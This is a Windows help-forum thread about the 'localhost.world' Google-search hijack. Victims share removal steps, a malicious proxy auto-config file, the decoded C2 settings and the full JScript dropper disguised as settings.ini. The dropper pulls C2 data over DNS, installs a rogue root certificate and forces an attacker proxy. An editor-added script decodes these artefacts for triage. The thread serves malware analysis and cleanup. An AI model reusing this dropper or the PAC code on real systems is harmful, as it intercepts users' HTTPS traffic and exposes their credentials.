Google redirection localhost.world - Page 11 of 12
  1.    08 Jan 2016 #101
    Join Date : Dec 2015
    Posts : 5
    WIN 7

    Something quite strange was detected in the registry.

    Even after I've successfully removed all the main causes of this malware, it seems that some remnants of it remained in my registry. Here is what I've found (when searching for keys containing the word 'localhost.world' or 'localhost' or '.world'):

    [ note - do NOT activate the attached *.reg ]
    [Attached: thumbnail "localhost.world - registry key.jpg" and the exported .reg file]
  2.    08 Jan 2016 #102
    Join Date : Jan 2016
    The Netherlands
    Posts : 11
    Windows 7 and 10

    This is nothing you have to worry about. The value is in your registry because you opened the file and it is now in your recent file list (the shortcut to this file, actually).
  3.    01 Feb 2016 #103
    Join Date : Feb 2016
    Posts : 1
    windows 7 ultimate

    Hi, I have been having the same problem.
    What happens is that "nslookup.exe" runs every day at 18:00 (GMT+0) and changes my settings to:

    [screenshot: Capture1.JPG]

    I tried checking the scheduler but nothing of the sort was there.

    After downloading the file, this is what was in it:

    Code:
    function FindProxyForURL(url, host) {
    // Google front page on any TLD (google.com, google.co.uk, ...), with or without the trailing slash
    ba = /^https?:\/\/www\.google\.[a-zA-Z.]+\/?$/;if (ba.test(url)) { return "PROXY 69.197.188.122:8484" }
    // Front page with a query string
    bb = /^https?:\/\/www\.google\.[a-zA-Z.]+\/\?(.*)$/;if (bb.test(url)) { return "PROXY 69.197.188.122:8484" }
    // Search result pages
    bc = /^https?:\/\/www\.google\.[a-zA-Z.]+\/search\?(.*)$/;if (bc.test(url)) { return "PROXY 69.197.188.122:8484" }
    // Custom Search pages on www.google.*
    bd = /^https?:\/\/www\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (bd.test(url)) { return "PROXY 69.197.188.122:8484" }
    // /s? requests
    be = /^https?:\/\/www\.google\.[a-zA-Z.]+\/s\?(.*)$/;if (be.test(url)) { return "PROXY 69.197.188.122:8484" }
    // Custom Search pages on cse.google.*
    bf = /^https?:\/\/cse\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (bf.test(url)) { return "PROXY 69.197.188.122:8484" }
    // Everything else bypasses the proxy, so the hijack is invisible outside Google search
    return "DIRECT";
    }
    I'm going to go through the 102 replies looking for a solution, but if anybody has a quick fix it'd be much appreciated.

    Thanks
  4.    01 Feb 2016 #104
    Join Date : Apr 2015
    Posts : 12,952
    W10Prox64

    Quote Originally Posted by nueru
    Hi, I have been having the same problem. What happens is that "nslookup.exe" runs every day at 18:00 (GMT+0) and changes my settings to: [...]
    Hi.
    Please read post #36 here. It should point you in the right direction.
  5.    12 Apr 2016 #105
    Join Date : Apr 2016
    Posts : 1
    Windows 10

    Quote Originally Posted by moraleja39 View Post
    Here are all the things I had to wipe:

    • The scheduled task. Its name was "Adobe Acrobat Pro DC Update". You can open the task scheduler writing taskschd.msc on the start menu search bar and hitting enter.
    • A file named "settings.ini" located in "%APPDATA%\Adobe Acrobat Pro DC". Full path could be "C:\Users\[username]\AppData\Roaming\Adobe Acrobat Pro DC\settings.ini".
    • In my case, two fake certificates. Open the certificate manager writing certmgr.msc on the start menu and hitting enter. The certificates are named "DO_NOT_TRUST_FiddlerRoot" and are under the folder "trusted root CAs" (or however it is in English)
    • Registry changes used to force proxy usage. In my case, I totally deleted the following values:
      • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
      • HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
      • HKCU\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache

    • Just in case it is still enabled, disable the proxy. Go to control panel, internet settings, connections, LAN settings, and disable all checkboxes.


    I also will attach the removed INI and certificate files, just in case they could be of use to anybody reading this, as they are not dangerous per se.
    That's not enough.
    I'm amazed that you haven't posted anything after this about how this comes back after a few days.

    To solve this crap for good you need to BLOCK the IP address of this localhost.world.
    If you don't, it will come back even if you delete this stuff.

    Block IP 69.197.188.122 in your firewall and you can forget this for good.
  6.    09 Nov 2016 #106
    Join Date : Nov 2016
    Posts : 6
    Windows 10

    Quote Originally Posted by moraleja39 View Post
    Hey. I've been struggling with this problem for a while, and I think I just solved it. However, I can assure you that this malware went undetected by all the many tools I scanned my PC with, so it may require some review by, I don't know, the guys who write those tools.

    Here we go: I noticed that Chrome getting closed and that cmd window flashing always happened at 18:00, so I searched in the task scheduler. Bingo:

    Attachment 54678
    (the first one, sorry for it being in Spanish)

    The action for that task is the following:
    Code:
    C:\Windows\system32\wscript.exe //nologo //B //E:jscript "C:\Users\[me]\AppData\Roaming\Adobe Acrobat Pro DC\settings.ini"
    Looking at that ini file, it was indeed a JS file badly disguised as INI. Stripped of all the comments, these are its contents:
    Code:
    // JScript dropper, run by wscript.exe from the scheduled task above (comments added for readability)
    var ns, no, re, rs, st, reg, pac, cer;
    var ws = new ActiveXObject("Wscript.Shell");
    var bs = new ActiveXObject("ADODB.Stream");
    var xh = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
    var tmp = ws.ExpandEnvironmentStrings("%TEMP%");
    try {
      // C2 over DNS: the TXT record carries "<PAC URL>|<certificate URL>"
      ns = ws.Exec("nslookup -type=txt remotesettings1.mtmyoq.se");
      no = ns.StdOut.ReadAll();
      re = new RegExp('"(.*?)"');   // first double-quoted string in the nslookup output
      rs = re.exec(no);
      st = rs[1].split("|");
      pac = st[0];
      cer = st[1];
      try {
        // Current proxy auto-config URL, if any (RegRead throws when the value is absent)
        reg = ws.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL");
      } catch (e) {
      }
      if (reg != pac) {
        // Setting missing or changed (e.g. cleaned up): kill the browsers so they reload the proxy settings
        ws.Run("taskkill /f /im iexplore.exe", 0, false);
        ws.Run("taskkill /f /im chrome.exe", 0, false);
        try {
          // Download the attacker's root certificate as a binary stream
          xh.Open("GET", cer, false);
          xh.Send();
          bs.Type = 1;                              // adTypeBinary
          bs.Open();
          bs.Write(xh.ResponseBody);
          bs.SaveToFile(tmp + "\\cert.cer", 2);     // adSaveCreateOverWrite
          // Install it in the current user's Trusted Root store, so certificates minted by the proxy for google.* are trusted
          ws.Run("certutil -addstore -f -enterprise -user root " + tmp + "\\cert.cer", 0, false);
          // Point WinINet (IE, and Chrome via the system proxy settings) at the attacker's PAC
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL", pac, "REG_SZ");
          // Stop WinINet from caching PAC results, so every request is re-evaluated
          ws.RegWrite("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnableAutoProxyResultCache", 0, "REG_DWORD");
        } catch (e$0) {
        }
      }
    } catch (e$1) {
    }
    Pretty much the behavior we are seeing.

    I can see that it also installs a certificate, probably to make that fake Google work through https without raising errors. I can't tell much about the certificate since I am not very well up on the subject. What I can tell is that it was created by the Fiddler free web debugging proxy, and that it shows on my installed certs as this:

    Attachment 54680
    Well yeah, do not trust.

    Interestingly, there are several domains involved in the malware. The first one is localhost.world, from where those smelly proxy settings are pulled, and the other is mtmyoq.se. This last one, when visited, contains a long string that, when base64 decoded, looks like this:
    Code:
    <Settings>
        <Setting>
            <ida>1122843206</ida>
            <UpdateVer>6.1.7600.20003</UpdateVer>
            <UpdateUrl></UpdateUrl>
            <UpdateType>2</UpdateType>
            <PacUrl>http://searchly.org/router.pac</PacUrl>
            <PacFile>ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZiAoc2hFeHBNYXRjaChob3N0LCAid3d3Lmdvb2dsZS4qIikpIHJldHVybiAiUFJPWFkgMTI3LjAuMC4xOjgwODAiOyAgcmV0dXJuICJESVJFQ1QiO30=</PacFile>
            <OneIn>1</OneIn>
            <RewriteFrom></RewriteFrom>
            <RewriteTo></RewriteTo>
            <DisableRewrite>0</DisableRewrite>
            <Ping>1</Ping>
            <RedirectType>0</RedirectType>
            <Accounts>
                <Account>
                    <RefUrl>http://www.digital4k.net/search.php?action=results&amp;sid=</RefUrl>
                    <CX>009793234822822480237:wabrdd_t6e8</CX>
                </Account>    
            </Accounts>
        </Setting>
    </Settings>
    I couldn't tell what that part is, but it involves more domains. What is clear is that this is obviously malware, probably an attempt at phishing. And none of those domains or IPs are blocked by my security software (ESET Smart Security) or seem to be blacklisted anywhere. This is not OK.

    Oh I almost forgot. To get rid of it, just delete the task, the .ini file, all the "DO_NOT_TRUST" certificates and revert the registry changes made. Ensure that there is not any proxy set.
    I registered an account here to say thank you. This has been bothering me for MONTHS and I have not been able to find ANY information on it. I have tried so many different anti-virus and anti-malware programs that have found nothing. I cannot thank you enough for saving me from having to reformat because of this. I wish I knew how we could share this with a large group of people, because this is a bigger problem than I think many realize. I am changing all my passwords - I hate to think what might have been compromised.
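As an added example (editor's addition, not code from the thread or from any poster), here is a triage script that pulls apart the two pieces of data quoted in the post above: the DNS TXT answer the dropper reads through nslookup, parsed the same way the dropper does it (first double-quoted string, split on "|"), and the Settings XML, with the base64 inside <PacFile> decoded. The nslookup output is constructed and its URLs are placeholders, not the real C2 values; the XML is copied from the post. Decoding shows a second PAC inside the config that sends all of www.google.* to a proxy on 127.0.0.1:8080 rather than to 69.197.188.122:8484; the thread does not show what, if anything, listened there. The CX value has the form of a Google Custom Search Engine id, which fits the /cse? rules in the PAC posted earlier. Function names (parseTxtAnswer, summarizeSettings, tagText) are mine.

```javascript
// Added example (not from the thread): decode the two artefacts quoted above.
// SAMPLE_NSLOOKUP is constructed to match the TXT-record format the dropper
// parses; SETTINGS_FROM_POST is the XML blob from the post, verbatim.

// 1. The C2 channel. The dropper runs `nslookup -type=txt <name>`, takes the
//    first double-quoted string in the output and splits it on "|" into
//    <PAC URL>|<certificate URL>. Same regex and split as the dropper.
function parseTxtAnswer(nslookupOutput) {
  const m = /"(.*?)"/.exec(nslookupOutput);
  if (!m) return null;
  const [pac, cer] = m[1].split("|");
  return { pac, cer };
}

// Constructed nslookup output; the URLs are placeholders, not real C2 values.
const SAMPLE_NSLOOKUP = [
  "Server:  UnKnown",
  "Address:  192.0.2.1",
  "",
  "Non-authoritative answer:",
  "remotesettings1.mtmyoq.se       text =",
  "",
  '        "http://pac.example.invalid/proxy.pac|http://pac.example.invalid/cert.cer"',
].join("\r\n");

// 2. The remote Settings blob: XML with a base64-encoded PAC in <PacFile>.
//    A regex tag reader is enough for this fixed, flat format.
function unescapeXml(s) {
  return s.replace(/&amp;/g, "&").replace(/&lt;/g, "<").replace(/&gt;/g, ">");
}
function tagText(xml, name) {
  const m = new RegExp(`<${name}>([\\s\\S]*?)</${name}>`).exec(xml);
  return m ? unescapeXml(m[1].trim()) : null;
}
function proxiesIn(pacText) {
  return [...new Set([...pacText.matchAll(/PROXY\s+([\w.\-]+:\d+)/g)].map((m) => m[1]))];
}
function summarizeSettings(xml) {
  const pacFile = tagText(xml, "PacFile");
  const embeddedPac = pacFile ? Buffer.from(pacFile, "base64").toString("utf8") : null;
  return {
    pacUrl: tagText(xml, "PacUrl"),
    embeddedPac,
    embeddedProxies: embeddedPac ? proxiesIn(embeddedPac) : [],
    refUrl: tagText(xml, "RefUrl"),
    cx: tagText(xml, "CX"),
  };
}

// The decoded Settings XML exactly as quoted in the post.
const SETTINGS_FROM_POST = `<Settings>
    <Setting>
        <ida>1122843206</ida>
        <UpdateVer>6.1.7600.20003</UpdateVer>
        <UpdateUrl></UpdateUrl>
        <UpdateType>2</UpdateType>
        <PacUrl>http://searchly.org/router.pac</PacUrl>
        <PacFile>ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZiAoc2hFeHBNYXRjaChob3N0LCAid3d3Lmdvb2dsZS4qIikpIHJldHVybiAiUFJPWFkgMTI3LjAuMC4xOjgwODAiOyAgcmV0dXJuICJESVJFQ1QiO30=</PacFile>
        <OneIn>1</OneIn>
        <RewriteFrom></RewriteFrom>
        <RewriteTo></RewriteTo>
        <DisableRewrite>0</DisableRewrite>
        <Ping>1</Ping>
        <RedirectType>0</RedirectType>
        <Accounts>
            <Account>
                <RefUrl>http://www.digital4k.net/search.php?action=results&amp;sid=</RefUrl>
                <CX>009793234822822480237:wabrdd_t6e8</CX>
            </Account>
        </Accounts>
    </Setting>
</Settings>`;

console.log("C2 answer:", parseTxtAnswer(SAMPLE_NSLOOKUP));
console.log("settings:", summarizeSettings(SETTINGS_FROM_POST));
```

The output gives the pac/cer pair the dropper would act on, the PacUrl (http://searchly.org/router.pac), the decoded embedded PAC (a shExpMatch on www.google.* returning PROXY 127.0.0.1:8080) and its proxy list. Because the dropper re-applies everything whenever AutoConfigURL differs from what the TXT record says, removing the registry values and the certificate without removing the scheduled task only lasts until 18:00 the next day; the task and the C2 hostname are the things to kill first, then the proxy hosts can go on a block list.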
  7.    10 Nov 2016 #107
    Join Date : Apr 2015
    Posts : 12,952
    W10Prox64

    Quote Originally Posted by korbinperry
    I registered an account here to say thank you. [...] I am changing all my passwords - I hate to think what might have been compromised.
    Hi korbinperry and welcome to Tenforums. Glad this was able to help you. Thanks for registering to let us know this worked for you as well.
  8.    10 Nov 2016 #108
    Join Date : Nov 2016
    Posts : 6
    Windows 10

    Quote Originally Posted by simrick View Post
    Hi korbinperry and welcome to Tenforums. Glad this was able to help you. Thanks for registering to let us know this worked for you as well.
    Absolutely!

    I actually have a question; maybe you can help... So for the most part this eliminated my problem. Mine was slightly different, and for the sake of transparency I'll share... mine wasn't coming from a fake Adobe updater, it came from a modified version of Microsoft Toolkit containing AutoKMS. Someone had snuck it in there. I have removed AutoKMS and MSTK, as far as I can tell, and am now genuine. My question is, I still see something trying to make an outbound connection. My Malwarebytes keeps picking up an outbound attempt at that IP we were all having issues with, on various ports, leading to svchost.exe. Not a fake svchost, the real deal. Any ideas how I could see what's causing this?
  9.    10 Nov 2016 #109
    Join Date : Apr 2015
    Posts : 12,952
    W10Prox64

    Quote Originally Posted by korbinperry
    [...] I still see something trying to make an outbound connection. My Malwarebytes keeps picking up an outbound attempt at that IP we were all having issues with, on various ports, leading to svchost.exe. Not a fake svchost, the real deal. Any ideas how I could see what's causing this?
    Hmmm... can you try using Process Explorer and maybe following the PIDs? Also, GlassWire may shed some light on things.
  10.    10 Nov 2016 #110
    Join Date : Nov 2016
    Posts : 6
    Windows 10

    Quote Originally Posted by simrick View Post
    hmmm.....can you try using process explorer and maybe following the PIDs? Also, GlassWire may shed some light on things.
    Good idea.. I'll report back anything I find in case it can help someone else! Thank you again!

 